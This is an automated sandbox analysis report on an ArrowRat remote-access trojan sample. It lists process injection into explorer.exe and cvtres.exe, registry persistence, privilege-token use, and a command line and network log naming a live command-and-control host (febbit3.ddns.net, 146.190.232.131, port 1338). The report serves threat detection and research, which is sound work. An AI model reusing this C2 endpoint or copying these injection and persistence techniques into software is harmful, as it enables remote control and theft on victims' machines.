Malware Analysis Report

2024-10-10 10:32

Sample ID 230909-z21nzsdh9y
Target 869e6e56d6c9849420442213a468c9fc
SHA256 9f46555944110c0b982e05620a58e6a3828fa6ad8e8dd8f55894e25150207a5e
Tags
5t74s3 arrowrat persistence rat
score
10/10

Analysis Overview

score
10/10

SHA256

9f46555944110c0b982e05620a58e6a3828fa6ad8e8dd8f55894e25150207a5e

Threat Level: Known bad

The file 869e6e56d6c9849420442213a468c9fc was found to be: Known bad.

Malicious Activity Summary

5t74s3 arrowrat persistence rat

ArrowRat

Arrowrat family

Modifies Installed Components in the registry

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Unsigned PE

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-09 21:13

Signatures

Arrowrat family

arrowrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-09 21:13

Reported

2023-09-09 21:18

Platform

win10-20230831-en

Max time kernel

300s

Max time network

302s

Command Line

"C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe"

Signatures

ArrowRat

rat arrowrat

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3004 set thread context of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\2717123927\3950266016.pri C:\Windows\explorer.exe N/A
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
File created C:\Windows\rescache\_merged\4032412167\2900507189.pri C:\Windows\explorer.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133379809249541381" C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3004 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\explorer.exe
PID 3004 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\explorer.exe
PID 3004 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 5028 wrote to memory of 4496 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 5028 wrote to memory of 4496 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe

Processes

C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe

"C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3004 -s 904

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 80.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
